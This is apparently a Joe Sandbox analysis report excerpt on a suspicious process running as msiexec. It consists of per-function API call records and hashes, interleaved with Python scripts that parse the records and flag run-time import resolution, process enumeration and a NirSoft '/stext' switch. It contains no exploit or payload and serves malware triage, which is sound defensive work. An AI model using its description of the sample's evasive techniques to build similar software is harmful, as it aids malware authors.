                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                              • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                              • String ID:
                                                              • API String ID: 2445788494-0
                                                              • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                              • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                              • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                              • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                              • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 3150196962-0
                                                              • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                              • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                              • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                              • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                              APIs
                                                              Strings
                                                              • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: malloc
                                                              • String ID: failed to allocate %u bytes of memory
                                                              • API String ID: 2803490479-1168259600
                                                              • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                              • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                              • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                              • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                              APIs
                                                              • memset.MSVCRT ref: 0041BDDF
                                                              • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcmpmemset
                                                              • String ID:
                                                              • API String ID: 1065087418-0
                                                              • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                              • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                              • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                              • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                              APIs
                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                              • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                              • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                              • String ID:
                                                              • API String ID: 1381354015-0
                                                              • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                              • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                              • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                              • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                              APIs
                                                              • memset.MSVCRT ref: 004301AD
                                                              • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID:
                                                              • API String ID: 1297977491-0
                                                              • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                              • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                              • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                              • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                              APIs
                                                                • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                              • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$Time$CloseCompareCreateHandlememset
                                                              • String ID:
                                                              • API String ID: 2154303073-0
                                                              • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                              • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                              • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                              • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                              APIs
                                                                • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 3150196962-0
                                                              • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                              • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                              • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                              • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
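The per-function records above are only useful in bulk once they are machine-readable: which functions resolve imports at run time through GetSystemDirectoryW + LoadLibraryW + GetProcAddress, which create temp files, and which compare against the `/stext` switch (the NirSoft utilities' save-to-text-file option). The following Python is an added example, not Joe Sandbox or report code, that parses records in the layout shown on this page (one or more `• Name.MODULE(args), ref: ADDR` call lines, a `Part of subcall function` prefix for inlined callees, the Strings and Similarity fields, and an `Instruction Fuzzy Hash` line closing each record) and tags the patterns a triager would pivot on. The sample input is four records copied from the listing, trimmed of the dump-source and Opcode/Instruction ID lines; the flag names are this example's own, not report terminology.

```python
"""Parse Joe Sandbox per-function API records into structured entries and flag triage-worthy call patterns."""
import re
from dataclasses import dataclass, field

# Constructed sample: four records copied from the listing above (indentation, dump-source
# and Opcode/Instruction ID lines dropped for brevity; the parser does not need them).
SAMPLE = """\
APIs
• GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
• GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
• GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
Similarity
• API ID: Temp$DirectoryFileNamePathWindows
• API String ID: 1125800050-0
• Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
APIs
Strings
Similarity
• API ID: _wcsicmp
• String ID: /stext
• API String ID: 2081463915-3817206916
• Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 00404453
• FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• API String ID: 3150196962-0
• Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
APIs
Strings
• failed to allocate %u bytes of memory, xrefs: 004152F0
Similarity
• API ID: malloc
• String ID: failed to allocate %u bytes of memory
• API String ID: 2803490479-1168259600
• Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
"""

# "• Name.MODULE(args), ref: ADDR", optionally prefixed with the subcall it belongs to.
CALL_RE = re.compile(r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
                     r"(?P<api>[^\s(]+)\.(?P<mod>[A-Z0-9]+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})")
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s?(?P<val>.*)$")  # "• API ID: ...", etc.


@dataclass
class FuncRecord:
    calls: list = field(default_factory=list)    # (api, module, call site, subcall address or None)
    fields: dict = field(default_factory=dict)   # "API ID", "String ID", "API String ID", ...
    strings: list = field(default_factory=list)  # (string, xref) from the Strings section

    def apis(self):
        return {api for api, _, _, _ in self.calls}

    def flags(self):
        # Patterns worth a second look; the flag names are this example's own.
        apis, found = self.apis(), set()
        if "GetProcAddress" in apis and apis & {"LoadLibraryW", "LoadLibraryA"}:
            found.add("dynamic_api_resolution")  # imports resolved at run time rather than via the IAT
        if apis & {"GetTempPathW", "GetTempFileNameW"}:
            found.add("temp_file_use")
        if "/stext" in self.fields.get("String ID", "") or any("/stext" in s for s, _ in self.strings):
            found.add("nirsoft_stext_switch")  # /stext is the NirSoft tools' save-to-text-file switch
        return found


def parse_records(text):
    """Split the listing into records; each record ends at its Instruction Fuzzy Hash line."""
    records, cur, section = [], FuncRecord(), None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped in ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"):
            section = stripped
            continue
        m = CALL_RE.match(line)
        if m:
            cur.calls.append((m["api"], m["mod"], m["ref"], m["sub"]))
            continue
        if section == "Strings" and ", xrefs: " in stripped:   # "• text, xrefs: ADDR"
            cur.strings.append(tuple(stripped.lstrip("• ").rsplit(", xrefs: ", 1)))
            continue
        m = FIELD_RE.match(line)
        if m:
            cur.fields[m["key"]] = m["val"].strip()
            if m["key"] == "Instruction Fuzzy Hash":   # last field of a record
                records.append(cur)
                cur = FuncRecord()
    return records


def triage(text):
    """Map API ID -> sorted flags for every record that trips at least one flag."""
    return {r.fields.get("API ID", ""): sorted(r.flags()) for r in parse_records(text) if r.flags()}
```

Two details matter when running this over the full listing rather than the sample. First, the parser tolerates records whose APIs or Strings items were lost in extraction (the `_wcsicmp` record above has an empty APIs section but still carries its `/stext` String ID), so flags are computed from both the call lines and the Similarity fields. Second, records that share an API String ID are the same call-and-string sequence at different addresses: the two `Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy` records with ID 3150196962-0 (GetProcAddress at 00404453 and at 0041362A) are one resolver pattern used from two places, which a group-by on `fields["API String ID"]` over the parsed records surfaces directly.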
                                                              APIs
                                                              • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$PointerRead
                                                              • String ID:
                                                              • API String ID: 3154509469-0
                                                              • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                              • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                              • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                              • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                              APIs
                                                              • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfile$StringWrite_itowmemset
                                                              • String ID:
                                                              • API String ID: 4232544981-0
                                                              • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                              • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                              • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                              • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                              • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                              • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                              • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                              APIs
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                              • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$FileModuleName
                                                              • String ID:
                                                              • API String ID: 3859505661-0
                                                              • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                              • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                              • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                              • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
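The entries in this section all share one fixed layout (an "APIs" list, then "Memory Dump Source", then "Similarity" fields), so they can be parsed and cross-referenced instead of read one at a time. The script below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses a constructed excerpt in that layout (addresses and API names copied from the entries above, assembled here as sample input), indexes direct call sites by API name, collects the export names the sample resolves through GetProcAddress, and tags each entry with a behaviour label. The label names and the RULES table are this example's own assumptions, not report terminology.

```python
import re
from collections import defaultdict

# Constructed sample in the layout of the "APIs / Memory Dump Source / Similarity"
# entries of this report. Addresses and API names are copied from the entries
# above; the excerpt itself is assembled for this example.
SAMPLE = """\
APIs
• GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
Memory Dump Source
• Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
Similarity
• API ID: PrivateProfile$StringWrite_itowmemset
• String ID:
• Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
APIs
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
• K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
Memory Dump Source
Similarity
• API ID: AddressProc$FileModuleName
• Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
APIs
• FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104), ref: 0040AEC8
Memory Dump Source
Similarity
• API ID: CloseFind
• Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
"""

# One API call line: optional "Part of subcall function XXXXXXXX:", then
# Name.MODULE(args), then "ref: XXXXXXXX". Args are optional (e.g. memset.MSVCRT).
CALL_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[^\s(.]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

# Assumed behaviour labels for this example (not report terminology).
RULES = {
    "dynamic-api-resolution": {"GetProcAddress"},
    "ini-config": {"GetPrivateProfileIntW", "WritePrivateProfileStringW"},
    "directory-walk": {"FindClose", "FindFirstFileW", "FindNextFileW"},
    "process-enumeration": {"K32GetModuleFileNameExW", "EnumProcesses", "EnumProcessModules"},
}


def classify_args(args):
    """Split a recorded argument list into hex constants, '?' unknowns,
    callback references (Function_...) and string literals."""
    out = {"hex": [], "unknown": 0, "callbacks": [], "strings": []}
    for tok in (args or "").split(","):
        tok = tok.strip()
        if not tok:
            continue
        if tok == "?":
            out["unknown"] += 1
        elif HEX_RE.match(tok):
            out["hex"].append(tok)
        elif tok.startswith("Function_"):
            out["callbacks"].append(tok)
        else:
            out["strings"].append(tok)
    return out


def parse_entries(text):
    """Split report text into entries, each with its call list and key/value fields."""
    entries, cur = [], None

    def new_entry():
        e = {"calls": [], "fields": {}}
        entries.append(e)
        return e

    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            cur = new_entry()
            continue
        if line == "Memory Dump Source":
            # An entry with no APIs block starts here; otherwise it is the
            # second part of the current entry.
            if cur is None or "Source File" in cur["fields"]:
                cur = new_entry()
            continue
        if line in ("Joe Sandbox IDA Plugin", "Similarity"):
            continue
        if cur is None:
            cur = new_entry()
        m = CALL_RE.match(line)
        if m:
            cur["calls"].append({"name": m["name"], "module": m["mod"], "sub": m["sub"],
                                 "ref": m["ref"].upper(), "args": classify_args(m["args"])})
            continue
        m = FIELD_RE.match(line)
        if m:
            cur["fields"][m["key"]] = m["val"]
    return entries


def api_index(entries):
    """Map each API name to the sorted call-site addresses of its direct calls."""
    idx = defaultdict(set)
    for e in entries:
        for c in e["calls"]:
            if c["sub"] is None:
                idx[c["name"]].add(c["ref"])
    return {k: sorted(v) for k, v in idx.items()}


def resolved_exports(entries):
    """String arguments passed to GetProcAddress, in order of first appearance."""
    seen = []
    for e in entries:
        for c in e["calls"]:
            if c["name"] == "GetProcAddress":
                seen.extend(s for s in c["args"]["strings"] if s not in seen)
    return seen


def tag_entry(entry):
    """Behaviour labels whose APIs appear in the entry, directly or via GetProcAddress."""
    names = {c["name"] for c in entry["calls"]} | set(resolved_exports([entry]))
    return sorted(tag for tag, apis in RULES.items() if names & apis)


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for api, refs in sorted(api_index(parsed).items()):
        print(f"{api:28s} {' '.join(refs)}")
    print("resolved via GetProcAddress:", resolved_exports(parsed))
    for e in parsed:
        print(e["fields"].get("Opcode ID", "?")[:16], tag_entry(e))
```

The point of the GetProcAddress pass is that names such as EnumProcesses and EnumProcessModules are looked up at run time, so they never appear in the dump's import table; a string scan of the unpacked region, or this kind of report parse, is where they surface.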
                                                              APIs
                                                              • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                              • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                              • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                              • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                              APIs
                                                              • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                              • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                              • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                              • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
